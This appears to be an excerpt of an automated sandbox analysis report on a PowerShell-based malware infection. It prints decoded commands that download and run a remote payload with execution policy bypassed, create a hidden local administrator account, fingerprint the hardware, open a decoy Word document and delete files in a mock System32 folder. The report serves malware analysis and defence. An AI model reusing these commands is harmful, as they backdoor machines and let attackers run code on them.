Source: powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: powershell.exe, 00000008.00000002.3586894637.0000028E7771D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4398652089.0000012FE8530000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlXz

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\svczHost.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\myRdpService.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 8900, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Start-Process powershell -WindowStyle hidden -ArgumentList "-WindowStyle Hidden", "-NoLogo", "-NoProfile", "-ExecutionPolicy Bypass", "-EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded IEX ([TEXT.ENCOdinG]::UTF8.GEtSTrING((IWr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly9jb2NvbWV0aG9kZS5kZS9aZA==")))).CONtENt))
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $uri = "https://cocomethode.de/file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5ed12e05cf2f53d7b015e76bd5b82239987c049defb9be7775f0b50e130d8dbede4588a06e0bb0568bc9dc5a959058d1b98732bb8da4c07dbb567f93f3706dd62fd21f5eae172d5026cdd5279f";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg \| ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages \| ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive \| Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test \| Out-File -FilePath "deviceId.txt" -Encoding UTF8
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens \| ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } \| Out-File -FilePath "C:\Windows\Temp\dp"
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded get-service "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Start-Process powershell -WindowStyle hidden -ArgumentList "-WindowStyle Hidden", "-NoLogo", "-NoProfile", "-ExecutionPolicy Bypass", "-EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded IEX ([TEXT.ENCOdinG]::UTF8.GEtSTrING((IWr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly9jb2NvbWV0aG9kZS5kZS9aZA==")))).CONtENt))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $uri = "https://cocomethode.de/file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5ed12e05cf2f53d7b015e76bd5b82239987c049defb9be7775f0b50e130d8dbede4588a06e0bb0568bc9dc5a959058d1b98732bb8da4c07dbb567f93f3706dd62fd21f5eae172d5026cdd5279f";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg \| ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages \| ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive \| Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test \| Out-File -FilePath "deviceId.txt" -Encoding UTF8
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded get-service "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens \| ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } \| Out-File -FilePath "C:\Windows\Temp\dp"

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpAC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2347.tmp" "c:\Users\user\AppData\Local\Temp\oho2nqxk\CSC33DBF5592E3045FEA3FE203350D9DA4A.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration-Form.docx.docx" /o ""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgAC
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
